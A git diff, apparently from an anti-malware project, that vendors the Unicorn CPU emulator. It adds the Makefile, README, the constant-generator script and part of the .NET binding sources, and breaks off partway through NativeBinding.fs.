$(UC_OBJ_ALL) +ifeq ($(UNICORN_SHARED),yes) +ifeq ($(V),0) + $(call log,GEN,$(LIBRARY)) + @$(CC) $(CFLAGS) -shared $(UC_OBJ_ALL) -o $(LIBRARY) $($(LIBNAME)_LDFLAGS) + @-ln -sf $(LIBRARY) $(LIBRARY_SYMLINK) +else + $(CC) $(CFLAGS) -shared $(UC_OBJ_ALL) -o $(LIBRARY) $($(LIBNAME)_LDFLAGS) + -ln -sf $(LIBRARY) $(LIBRARY_SYMLINK) +endif +ifeq ($(DO_WINDOWS_EXPORT),1) +ifneq ($(filter MINGW32%,$(UNAME_S)),) + cmd //C "windows_export.bat x86" +else + cmd //C "windows_export.bat x64" +endif +endif +endif + +$(ARCHIVE): $(UC_OBJ_ALL) +ifeq ($(UNICORN_STATIC),yes) +ifeq ($(V),0) + $(call log,GEN,$(ARCHIVE)) + @$(AR) q $(ARCHIVE) $(UC_OBJ_ALL) + @$(RANLIB) $(ARCHIVE) +else + $(AR) q $(ARCHIVE) $(UC_OBJ_ALL) + $(RANLIB) $(ARCHIVE) +endif +endif + +$(PKGCFGF): + $(generate-pkgcfg) + + +fuzz: all + $(MAKE) -C tests/fuzz all + +test: all + $(MAKE) -C tests/unit test + $(MAKE) -C tests/regress test + $(MAKE) -C bindings test + +install: $(LIBRARY) $(ARCHIVE) $(PKGCFGF) + install -d $(DESTDIR)$(LIBDIR) +ifeq ($(UNICORN_SHARED),yes) +ifneq ($(filter CYGWIN%,$(UNAME_S)),) + $(INSTALL_LIB) $(LIBRARY) $(DESTDIR)$(BINDIR) + $(INSTALL_DATA) $(LIBRARY_DLLA) $(DESTDIR)$(LIBDIR) +else + $(INSTALL_LIB) $(LIBRARY) $(DESTDIR)$(LIBDIR) +endif +ifneq ($(VERSION_EXT),) + cd $(DESTDIR)$(LIBDIR) && \ + ln -sf lib$(LIBNAME).$(VERSION_EXT) lib$(LIBNAME).$(EXT) +endif +endif +ifeq ($(UNICORN_STATIC),yes) + $(INSTALL_DATA) $(ARCHIVE) $(DESTDIR)$(LIBDIR) +endif + install -d $(DESTDIR)$(INCDIR)/$(LIBNAME) + $(INSTALL_DATA) include/unicorn/*.h $(DESTDIR)$(INCDIR)/$(LIBNAME) + install -d $(DESTDIR)$(PKGCFGDIR) + $(INSTALL_DATA) $(PKGCFGF) $(DESTDIR)$(PKGCFGDIR)/ + + +TAG ?= HEAD +ifeq ($(TAG), HEAD) +DIST_VERSION = latest +else +DIST_VERSION = $(TAG) +endif + +bindings: all + $(MAKE) -C bindings build + $(MAKE) -C bindings samples + +dist: + git archive --format=tar.gz --prefix=unicorn-$(DIST_VERSION)/ $(TAG) > unicorn-$(DIST_VERSION).tgz + git archive --format=zip --prefix=unicorn-$(DIST_VERSION)/ $(TAG) > unicorn-$(DIST_VERSION).zip + + +# run "make header" whenever qemu/header_gen.py is modified +header: + $(eval TARGETS := m68k arm armeb aarch64 aarch64eb mips mipsel mips64 mips64el\ + sparc sparc64 x86_64) + $(foreach var,$(TARGETS),\ + $(shell python qemu/header_gen.py $(var) > qemu/$(var).h;)) + @echo "Generated headers for $(TARGETS)." + + +uninstall: + rm -rf $(INCDIR)/$(LIBNAME) + rm -f $(LIBDIR)/lib$(LIBNAME).* + rm -f $(BINDIR)/cyg$(LIBNAME).* + rm -f $(PKGCFGDIR)/$(LIBNAME).pc + + +clean: + $(MAKE) -C qemu distclean + rm -rf *.d *.o + rm -rf lib$(LIBNAME)* $(LIBNAME)*.lib $(LIBNAME)*.dll $(LIBNAME)*.a $(LIBNAME)*.def $(LIBNAME)*.exp cyg$(LIBNAME)*.dll + $(MAKE) -C samples clean + $(MAKE) -C tests/unit clean + + +define generate-pkgcfg + echo 'Name: unicorn' > $(PKGCFGF) + echo 'Description: Unicorn emulator engine' >> $(PKGCFGF) + echo 'Version: $(PKG_VERSION)' >> $(PKGCFGF) + echo 'libdir=$(LIBDIR)' >> $(PKGCFGF) + echo 'includedir=$(INCDIR)' >> $(PKGCFGF) + echo 'archive=$${libdir}/libunicorn.a' >> $(PKGCFGF) + echo 'Libs: -L$${libdir} -lunicorn' >> $(PKGCFGF) + echo 'Cflags: -I$${includedir}' >> $(PKGCFGF) +endef + + +define log + @printf " %-7s %s\n" "$(1)" "$(2)" +endef diff --git a/ai_anti_malware/unicorn/unicorn-master/README.md b/ai_anti_malware/unicorn/unicorn-master/README.md new file mode 100644 index 0000000..1a19f30 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/README.md @@ -0,0 +1,54 @@ +Unicorn Engine +============== + +[![Join the chat at https://gitter.im/unicorn-engine/chat](https://badges.gitter.im/unicorn-engine/unicorn.svg)](https://gitter.im/unicorn-engine/chat?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) +[![Build Status](https://travis-ci.org/unicorn-engine/unicorn.svg?branch=master)](https://travis-ci.org/unicorn-engine/unicorn) +[![pypi downloads](https://pepy.tech/badge/unicorn)](https://pepy.tech/project/unicorn) +[![Fuzzing Status](https://oss-fuzz-build-logs.storage.googleapis.com/badges/unicorn.svg)](https://bugs.chromium.org/p/oss-fuzz/issues/list?sort=-opened&can=1&q=proj:unicorn) + +Unicorn is a lightweight, multi-platform, multi-architecture CPU emulator framework +based on [QEMU](http://qemu.org). + +Unicorn offers some unparalleled features: + +- Multi-architecture: ARM, ARM64 (ARMv8), M68K, MIPS, SPARC, and X86 (16, 32, 64-bit) +- Clean/simple/lightweight/intuitive architecture-neutral API +- Implemented in pure C language, with bindings for Crystal, Clojure, Visual Basic, Perl, Rust, Ruby, Python, Java, .NET, Go, Delphi/Free Pascal, Haskell, Pharo, and Lua. +- Native support for Windows & *nix (with Mac OSX, Linux, *BSD & Solaris confirmed) +- High performance via Just-In-Time compilation +- Support for fine-grained instrumentation at various levels +- Thread-safety by design +- Distributed under free software license GPLv2 + +Further information is available at http://www.unicorn-engine.org + + +License +------- + +This project is released under the [GPL license](COPYING). + + +Compilation & Docs +------------------ + +See [docs/COMPILE.md](docs/COMPILE.md) file for how to compile and install Unicorn. + +More documentation is available in [docs/README.md](docs/README.md). + + +Contact +------- + +[Contact us](http://www.unicorn-engine.org/contact/) via mailing list, email or twitter for any questions. + + +Contribute +---------- + +If you want to contribute, please pick up something from our [Github issues](https://github.com/unicorn-engine/unicorn/issues). + +We also maintain a list of more challenged problems in a [TODO list](https://github.com/unicorn-engine/unicorn/wiki/TODO). + +[CREDITS.TXT](CREDITS.TXT) records important contributors of our project. + diff --git a/ai_anti_malware/unicorn/unicorn-master/SPONSORS.TXT b/ai_anti_malware/unicorn/unicorn-master/SPONSORS.TXT new file mode 100644 index 0000000..ecdc457 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/SPONSORS.TXT @@ -0,0 +1,7 @@ +* Version 1.0.2 - October 21st, 2020 + +Release 1.0.2 was sponsored by the following companies (in no particular order). + +- Catena Cyber: https://catenacyber.fr +- Grayshift: https://grayshift.com +- Google: https://google.com diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/Makefile b/ai_anti_malware/unicorn/unicorn-master/bindings/Makefile new file mode 100644 index 0000000..296b44f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/Makefile @@ -0,0 +1,54 @@ +# Unicorn Engine +# By Nguyen Anh Quynh & Dang Hoang Vu, 2015 +DIFF = diff + +SAMPLE_SOURCE = $(wildcard ../samples/*.c) +SAMPLE = $(SAMPLE_SOURCE:../samples/%.c=%) +SAMPLE := $(SAMPLE:mem_apis=) +SAMPLE := $(SAMPLE:sample_batch_reg=) +SAMPLE := $(SAMPLE:sample_x86_32_gdt_and_seg_regs=) +SAMPLE := $(SAMPLE:shellcode=) + +UNAME_S := $(shell uname -s) +ifeq ($(UNAME_S), Linux) +ENV_VARS = LD_PRELOAD=librt.so LD_LIBRARY_PATH=../ DYLD_LIBRARY_PATH=../ +else +ENV_VARS = LD_LIBRARY_PATH=../ DYLD_LIBRARY_PATH=../ LIBUNICORN_PATH=$(TRAVIS_BUILD_DIR) +endif + + +.PHONY: build install python c clean check test + +build: + $(MAKE) -C python gen_const + $(MAKE) -C go gen_const + $(MAKE) -C java gen_const + $(MAKE) -C ruby gen_const + python const_generator.py dotnet + python const_generator.py pascal + +install: build + $(MAKE) -C python install + $(MAKE) -C java install + +test: $(SAMPLE:%=%.py.test) + +c: + $(MAKE) -C ../samples +python: + $(MAKE) -C python +%.c.txt: c + $(ENV_VARS) ../samples/$(@:%.c.txt=%) > $@ +%.py.txt: python + $(ENV_VARS) python python/$(@:%.txt=%) > $@ + +%.py.test: %.c.txt %.py.txt + $(DIFF) -u $(@:%.py.test=%.c.txt) $(@:%.py.test=%.py.txt) + +clean: +# rm -rf *.txt + $(MAKE) -C python clean + $(MAKE) -C java clean + +check: + make -C python check diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/README b/ai_anti_malware/unicorn/unicorn-master/bindings/README new file mode 100644 index 0000000..4df67f6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/README @@ -0,0 +1,38 @@ +This directory contains bindings & test code for Python, Java, Go and .NET. +See /README or /README.TXT or /README.md for how to install each binding. + +The following bindings are contributed by community. + +- Java binding: by Chris Eagle. +- Go binding: by Ryan Hileman. +- .NET binding: by Antonio Parata. +- Ruby binding: by Sascha Schirra +- Haskell binding: by Adrian Herrera. +- VB6 binding: David Zimmer. +- FreePascal/Delphi binding: Mohamed Osama. + +More bindings created & maintained externally by community are available as follows. + +- UnicornPascal: Delphi/Free Pascal binding (by Stievie). + https://github.com/stievie/UnicornPascal + +- Unicorn-Rs: Rust binding (by Sébastien Duquette) + https://github.com/ekse/unicorn-rs + +- UnicornEngine: Perl binding (by Vikas Naresh Kumar) + https://metacpan.org/pod/UnicornEngine + +- Unicorn.CR: Crystal binding (by Benoit Côté-Jodoin) + https://github.com/Becojo/unicorn.cr + +- Deimos/unicorn: D binding (by Vladimir Panteleev) + https://github.com/D-Programming-Deimos/unicorn + +- Unicorn-Lua: Lua binding (by Diego Argueta) + https://github.com/dargueta/unicorn-lua + +- pharo-unicorn: Pharo binding (by Guille Polito) + https://github.com/guillep/pharo-unicorn + +- Unicorn.js: JavaScript binding (by Alexandro Sanchez) + https://github.com/AlexAltea/unicorn.js diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/const_generator.py b/ai_anti_malware/unicorn/unicorn-master/bindings/const_generator.py new file mode 100644 index 0000000..daa18f0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/const_generator.py @@ -0,0 +1,204 @@ +#!/usr/bin/env python3 +# Unicorn Engine +# By Dang Hoang Vu, 2013 +from __future__ import print_function +import sys, re, os + +INCL_DIR = os.path.join('..', 'include', 'unicorn') + +include = [ 'arm.h', 'arm64.h', 'mips.h', 'x86.h', 'sparc.h', 'm68k.h', 'unicorn.h' ] + +template = { + 'python': { + 'header': "# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [%s_const.py]\n", + 'footer': "", + 'line_format': 'UC_%s = %s\n', + 'out_file': './python/unicorn/%s_const.py', + # prefixes for constant filenames of all archs - case sensitive + 'arm.h': 'arm', + 'arm64.h': 'arm64', + 'mips.h': 'mips', + 'x86.h': 'x86', + 'sparc.h': 'sparc', + 'm68k.h': 'm68k', + 'unicorn.h': 'unicorn', + 'comment_open': '#', + 'comment_close': '', + }, + 'ruby': { + 'header': "# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [%s_const.rb]\n\nmodule UnicornEngine\n", + 'footer': "end", + 'line_format': '\tUC_%s = %s\n', + 'out_file': './ruby/unicorn_gem/lib/unicorn_engine/%s_const.rb', + # prefixes for constant filenames of all archs - case sensitive + 'arm.h': 'arm', + 'arm64.h': 'arm64', + 'mips.h': 'mips', + 'x86.h': 'x86', + 'sparc.h': 'sparc', + 'm68k.h': 'm68k', + 'unicorn.h': 'unicorn', + 'comment_open': '#', + 'comment_close': '', + }, + 'go': { + 'header': "package unicorn\n// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [%s_const.go]\nconst (\n", + 'footer': ")", + 'line_format': '\t%s = %s\n', + 'out_file': './go/unicorn/%s_const.go', + # prefixes for constant filenames of all archs - case sensitive + 'arm.h': 'arm', + 'arm64.h': 'arm64', + 'mips.h': 'mips', + 'x86.h': 'x86', + 'sparc.h': 'sparc', + 'm68k.h': 'm68k', + 'unicorn.h': 'unicorn', + 'comment_open': '//', + 'comment_close': '', + }, + 'java': { + 'header': "// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT\n\npackage unicorn;\n\npublic interface %sConst {\n", + 'footer': "\n}\n", + 'line_format': ' public static final int UC_%s = %s;\n', + 'out_file': './java/unicorn/%sConst.java', + # prefixes for constant filenames of all archs - case sensitive + 'arm.h': 'Arm', + 'arm64.h': 'Arm64', + 'mips.h': 'Mips', + 'x86.h': 'X86', + 'sparc.h': 'Sparc', + 'm68k.h': 'M68k', + 'unicorn.h': 'Unicorn', + 'comment_open': '//', + 'comment_close': '', + }, + 'dotnet': { + 'header': "// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT\n\nnamespace UnicornManaged.Const\n\nopen System\n\n[]\nmodule %s =\n", + 'footer': "\n", + 'line_format': ' let UC_%s = %s\n', + 'out_file': os.path.join('dotnet', 'UnicornManaged', 'Const', '%s.fs'), + # prefixes for constant filenames of all archs - case sensitive + 'arm.h': 'Arm', + 'arm64.h': 'Arm64', + 'mips.h': 'Mips', + 'x86.h': 'X86', + 'sparc.h': 'Sparc', + 'm68k.h': 'M68k', + 'unicorn.h': 'Common', + 'comment_open': ' //', + 'comment_close': '', + }, + 'pascal': { + 'header': "// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT\n\nunit %sConst;\n\ninterface\n\nconst", + 'footer': "\nimplementation\nend.", + 'line_format': ' UC_%s = %s;\n', + 'out_file': os.path.join('pascal', 'unicorn', '%sConst.pas'), + # prefixes for constant filenames of all archs - case sensitive + 'arm.h': 'Arm', + 'arm64.h': 'Arm64', + 'mips.h': 'Mips', + 'x86.h': 'X86', + 'sparc.h': 'Sparc', + 'm68k.h': 'M68k', + 'unicorn.h': 'Unicorn', + 'comment_open': '//', + 'comment_close': '', + }, +} + +# markup for comments to be added to autogen files +MARKUP = '//>' + +def gen(lang): + global include, INCL_DIR + templ = template[lang] + for target in include: + prefix = templ[target] + outfile = open(templ['out_file'] %(prefix), 'wb') # open as binary prevents windows newlines + outfile.write((templ['header'] % (prefix)).encode("utf-8")) + if target == 'unicorn.h': + prefix = '' + with open(os.path.join(INCL_DIR, target)) as f: + lines = f.readlines() + + previous = {} + count = 0 + for line in lines: + line = line.strip() + + if line.startswith(MARKUP): # markup for comments + outfile.write(("\n%s%s%s\n" %(templ['comment_open'], \ + line.replace(MARKUP, ''), templ['comment_close'])).encode("utf-8")) + continue + + if line == '' or line.startswith('//'): + continue + + tmp = line.strip().split(',') + for t in tmp: + t = t.strip() + if not t or t.startswith('//'): continue + f = re.split('\s+', t) + + # parse #define UC_TARGET (num) + define = False + if f[0] == '#define' and len(f) >= 3: + define = True + f.pop(0) + f.insert(1, '=') + + if f[0].startswith("UC_" + prefix.upper()): + if len(f) > 1 and f[1] not in ('//', '='): + print("WARNING: Unable to convert %s" % f) + print(" Line =", line) + continue + elif len(f) > 1 and f[1] == '=': + rhs = ''.join(f[2:]) + else: + rhs = str(count) + + lhs = f[0].strip() + # evaluate bitshifts in constants e.g. "UC_X86 = 1 << 1" + match = re.match(r'(?P\s*\d+\s*<<\s*\d+\s*)', rhs) + if match: + rhs = str(eval(match.group(1))) + else: + # evaluate references to other constants e.g. "UC_ARM_REG_X = UC_ARM_REG_SP" + match = re.match(r'^([^\d]\w+)$', rhs) + if match: + rhs = previous[match.group(1)] + + if not rhs.isdigit(): + for k, v in previous.items(): + rhs = re.sub(r'\b%s\b' % k, v, rhs) + rhs = str(eval(rhs)) + + lhs_strip = re.sub(r'^UC_', '', lhs) + count = int(rhs) + 1 + if (count == 1): + outfile.write(("\n").encode("utf-8")) + + outfile.write((templ['line_format'] % (lhs_strip, rhs)).encode("utf-8")) + previous[lhs] = str(rhs) + + outfile.write((templ['footer']).encode("utf-8")) + outfile.close() + +def main(): + lang = sys.argv[1] + if lang == "all": + for lang in template.keys(): + print("Generating constants for {}".format(lang)) + gen(lang) + else: + if not lang in template: + raise RuntimeError("Unsupported binding %s" % lang) + gen(lang) + +if __name__ == "__main__": + if len(sys.argv) < 2: + print("Usage:", sys.argv[0], " ") + print("Supported: {}".format(["all"] + [x for x in template.keys()])) + sys.exit(1) + main() diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/README.md b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/README.md new file mode 100644 index 0000000..7717164 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/README.md @@ -0,0 +1,30 @@ +This documentation explains how to use the .NET binding for Unicorn +from source. + +0. Install the core engine as a dependency + + Follow README in the root directory to compile & install the core. + +1. Compile the code + + [Windows] + To compile the code open the UnicornSln.sln with Microsoft Visual + Studio 12 or with a newer version and just press Ctrl+Shift+B to build + the solution. + + You need to have installed at least version 4.5 of the .NET framework. + + [Linux] + TODO + +2. Usage + + The solution includes the testing project UnicornTests with examples + of usage. + + In order to use the library in your project just add a reference to + the .NET library and be sure to copy the unmanaged unicorn.dll + library in the output directory. + + The naming convention used is the Upper Camel Case, this mean that to + invoke the uc_mem_read method you have to search for the MemRead method. diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornDotNet.sln b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornDotNet.sln new file mode 100644 index 0000000..90aa5b6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornDotNet.sln @@ -0,0 +1,28 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 14 +VisualStudioVersion = 14.0.23107.0 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "UnicornSamples", "UnicornSamples\UnicornSamples.csproj", "{B80B5987-1E24-4309-8BF9-C4F91270F21C}" +EndProject +Project("{F2A71F9B-5D33-465A-A702-920D77279786}") = "UnicornManaged", "UnicornManaged\UnicornManaged.fsproj", "{0C21F1C1-2725-4A46-9022-1905F85822A5}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Any CPU = Debug|Any CPU + Release|Any CPU = Release|Any CPU + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {B80B5987-1E24-4309-8BF9-C4F91270F21C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {B80B5987-1E24-4309-8BF9-C4F91270F21C}.Debug|Any CPU.Build.0 = Debug|Any CPU + {B80B5987-1E24-4309-8BF9-C4F91270F21C}.Release|Any CPU.ActiveCfg = Release|Any CPU + {B80B5987-1E24-4309-8BF9-C4F91270F21C}.Release|Any CPU.Build.0 = Release|Any CPU + {0C21F1C1-2725-4A46-9022-1905F85822A5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {0C21F1C1-2725-4A46-9022-1905F85822A5}.Debug|Any CPU.Build.0 = Debug|Any CPU + {0C21F1C1-2725-4A46-9022-1905F85822A5}.Release|Any CPU.ActiveCfg = Release|Any CPU + {0C21F1C1-2725-4A46-9022-1905F85822A5}.Release|Any CPU.Build.0 = Release|Any CPU + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/AssemblyInfo.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/AssemblyInfo.fs new file mode 100644 index 0000000..16d8c91 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/AssemblyInfo.fs @@ -0,0 +1,41 @@ +namespace UnicornManaged.AssemblyInfo + +open System.Reflection +open System.Runtime.CompilerServices +open System.Runtime.InteropServices + +// General Information about an assembly is controlled through the following +// set of attributes. Change these attribute values to modify the information +// associated with an assembly. +[] +[] +[] +[] +[] +[] +[] +[] + +// Setting ComVisible to false makes the types in this assembly not visible +// to COM components. If you need to access a type in this assembly from +// COM, set the ComVisible attribute to true on that type. +[] + +// The following GUID is for the ID of the typelib if this project is exposed to COM +[] + +// Version information for an assembly consists of the following four values: +// +// Major Version +// Minor Version +// Build Number +// Revision +// +// You can specify all the values or you can default the Build and Revision Numbers +// by using the '*' as shown below: +// [] +[] +[] + +do + () \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/BindingFactory.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/BindingFactory.fs new file mode 100644 index 0000000..f55f72e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/BindingFactory.fs @@ -0,0 +1,13 @@ +namespace UnicornManaged.Binding + +open System + +module BindingFactory = + let mutable _instance = NativeBinding.instance + + let setDefaultBinding(binding: IBinding) = + _instance <- binding + + let getDefault() = + _instance + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/IBinding.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/IBinding.fs new file mode 100644 index 0000000..7ef6d27 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/IBinding.fs @@ -0,0 +1,28 @@ +namespace UnicornManaged.Binding + +open System + +type IBinding = + interface + abstract Version : UIntPtr * UIntPtr -> Int32 + abstract ArchSupported : Int32 -> Boolean + abstract UcOpen : UInt32 * UInt32 * UIntPtr array -> Int32 + abstract Close : UIntPtr -> Int32 + abstract Strerror : Int32 -> IntPtr + abstract Errono : UIntPtr -> Int32 + abstract RegRead : UIntPtr * Int32 * Byte array -> Int32 + abstract RegWrite : UIntPtr * Int32 * Byte array -> Int32 + abstract MemRead : UIntPtr * UInt64 * Byte array * UIntPtr -> Int32 + abstract MemWrite : UIntPtr * UInt64 * Byte array * UIntPtr -> Int32 + abstract EmuStart : UIntPtr * UInt64 * UInt64 * UInt64 * UInt64 -> Int32 + abstract EmuStop : UIntPtr -> Int32 + abstract HookDel : UIntPtr * UIntPtr -> Int32 + abstract MemMap : UIntPtr * UInt64 * UIntPtr * UInt32 -> Int32 + abstract MemMapPtr : UIntPtr * UInt64 * UIntPtr * UInt32 * UIntPtr -> Int32 + abstract MemUnmap : UIntPtr * UInt64 * UIntPtr -> Int32 + abstract MemProtect : UIntPtr * UInt64 * UIntPtr * UInt32 -> Int32 + abstract HookAddNoarg : UIntPtr * UIntPtr * Int32 * UIntPtr * IntPtr * UInt64 * UInt64 -> Int32 + abstract HookAddArg0 : UIntPtr * UIntPtr * Int32 * UIntPtr * IntPtr * UInt64 * UInt64 * Int32 -> Int32 + abstract HookAddArg0Arg1 : UIntPtr * UIntPtr * Int32 * UIntPtr * IntPtr * UInt64 * UInt64 * UInt64 * UInt64 -> Int32 + end + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/MockBinding.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/MockBinding.fs new file mode 100644 index 0000000..7b99c8e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/MockBinding.fs @@ -0,0 +1,51 @@ +namespace UnicornManaged.Binding + +open System + +module internal MockBinding = + // by using a mutables variables it is easier to create testing code + let mutable version = fun(major, minor) -> 0 + let mutable uc_open = fun(arch, mode, uc) -> 0 + let mutable close = fun(eng) -> 0 + let mutable mem_map = fun(eng, adress, size, perm) -> 0 + let mutable mem_map_ptr = fun(eng, address, size, perms, ptr) -> 0 + let mutable mem_unmap = fun(eng, address, size) -> 0 + let mutable mem_protect = fun(eng, address, size, perms) -> 0 + let mutable mem_write = fun(eng, adress, value, size) -> 0 + let mutable mem_read = fun(eng, adress, value, size) -> 0 + let mutable reg_write = fun(eng, regId, value) -> 0 + let mutable reg_read = fun(eng, regId, value) -> 0 + let mutable emu_start = fun(eng, beginAddr, untilAddr, timeout, count) -> 0 + let mutable emu_stop = fun(eng) -> 0 + let mutable hook_del = fun(eng, hook) -> 0 + let mutable arch_supported = fun(arch) -> true + let mutable errno = fun(eng) -> 0 + let mutable strerror = fun(err) -> new nativeint(0) + let mutable hook_add_noarg = fun(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) -> 0 + let mutable hook_add_arg0 = fun(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) -> 0 + let mutable hook_add_arg0_arg1 = fun(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) -> 0 + + let instance = + {new IBinding with + member thi.Version(major, minor) = version(major, minor) + member thi.UcOpen(arch, mode, uc) = uc_open(arch, mode, uc) + member thi.Close(eng) = close(eng) + member thi.MemMap(eng, adress, size, perm) = mem_map(eng, adress, size, perm) + member thi.MemWrite(eng, adress, value, size) = mem_write(eng, adress, value, size) + member thi.MemRead(eng, adress, value, size) = mem_read(eng, adress, value, size) + member thi.RegWrite(eng, regId, value) = reg_write(eng, regId, value) + member thi.RegRead(eng, regId, value) = reg_read(eng, regId, value) + member thi.EmuStart(eng, beginAddr, untilAddr, timeout, count) = emu_start(eng, beginAddr, untilAddr, timeout, count) + member thi.EmuStop(eng) = emu_stop(eng) + member this.HookDel(eng, hook) = hook_del(eng, hook) + member thi.ArchSupported(arch) = arch_supported(arch) + member thi.Errono(eng) = errno(eng) + member thi.Strerror(err) = strerror(err) + member this.MemMapPtr(eng, address, size, perms, ptr) = mem_map_ptr(eng, address, size, perms, ptr) + member this.MemUnmap(eng, address, size) = mem_unmap(eng, address, size) + member this.MemProtect(eng, address, size, perms) = mem_protect(eng, address, size, perms) + member thi.HookAddNoarg(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) = hook_add_noarg(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) + member thi.HookAddArg0(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) = hook_add_arg0(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) + member thi.HookAddArg0Arg1(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) = hook_add_arg0_arg1(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) + } + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/NativeBinding.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/NativeBinding.fs new file mode 100644 index 0000000..6be7b2f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Binding/NativeBinding.fs @@ -0,0 +1,93 @@ +namespace UnicornManaged.Binding + +open System +open System.Runtime.InteropServices + +module NativeBinding = + + [] + module private Imported = + + [] + extern Int32 uc_version(UIntPtr major, UIntPtr minor) + + [] + extern Int32 uc_open(UInt32 arch, UInt32 mode, UIntPtr[] engine) + + [] + extern Int32 uc_close(UIntPtr eng) + + [] + extern Int32 uc_mem_map(UIntPtr eng, UInt64 address, UIntPtr size, UInt32 perm) + + [] + extern Int32 uc_mem_map_ptr(UIntPtr eng, UInt64 address, UIntPtr size, UInt32 perm, UIntPtr ptr) + + [] + extern Int32 uc_mem_unmap(UIntPtr eng, UInt64 address, UIntPtr size) + + [] + extern Int32 uc_mem_protect(UIntPtr eng, UInt64 address, UIntPtr size, UInt32 perms) + + [] + extern Int32 uc_mem_write(UIntPtr eng, UInt64 address, Byte[] value, UIntPtr size) + + [] + extern Int32 uc_mem_read(UIntPtr eng, UInt64 address, Byte[] value, UIntPtr size) + + [] + extern Int32 uc_reg_write(UIntPtr eng, Int32 regId, Byte[] value) + + [] + extern Int32 uc_reg_read(UIntPtr eng, Int32 regId, Byte[] value) + + [] + extern Int32 uc_emu_start(UIntPtr eng, UInt64 beginAddr, UInt64 untilAddr, UInt64 timeout, UInt64 count) + + [] + extern Int32 uc_emu_stop(UIntPtr eng) + + [] + extern Int32 uc_hook_del(UIntPtr eng, UIntPtr hook) + + [] + extern Boolean uc_arch_supported(Int32 arch) + + [] + extern Int32 uc_errno(UIntPtr eng) + + [] + extern IntPtr uc_strerror(Int32 err) + + [] + extern Int32 uc_hook_add_noarg(UIntPtr eng, UIntPtr hh, Int32 callbackType, UIntPtr callback, IntPtr userData, UInt64 hookbegin, UInt64 hookend) + + [] + extern Int32 uc_hook_add_arg0(UIntPtr eng, UIntPtr hh, Int32 callbackType, UIntPtr callback, IntPtr userData, UInt64 hookbegin, UInt64 hookend, Int32 arg0) + + [] + extern Int32 uc_hook_add_arg0_arg1(UIntPtr eng, UIntPtr hh, Int32 callbackType, UIntPtr callback, IntPtr userData, UInt64 hookbegin, UInt64 hookend, UInt64 arg0, UInt64 arg1) + + let instance = + {new IBinding with + member thi.Version(major, minor) = uc_version(major, minor) + member thi.UcOpen(arch, mode, uc) = uc_open(arch, mode, uc) + member thi.Close(eng) = uc_close(eng) + member thi.MemMap(eng, adress, size, perm) = uc_mem_map(eng, adress, size, perm) + member thi.MemWrite(eng, adress, value, size) = uc_mem_write(eng, adress, value, size) + member thi.MemRead(eng, adress, value, size) = uc_mem_read(eng, adress, value, size) + member thi.RegWrite(eng, regId, value) = uc_reg_write(eng, regId, value) + member thi.RegRead(eng, regId, value) = uc_reg_read(eng, regId, value) + member 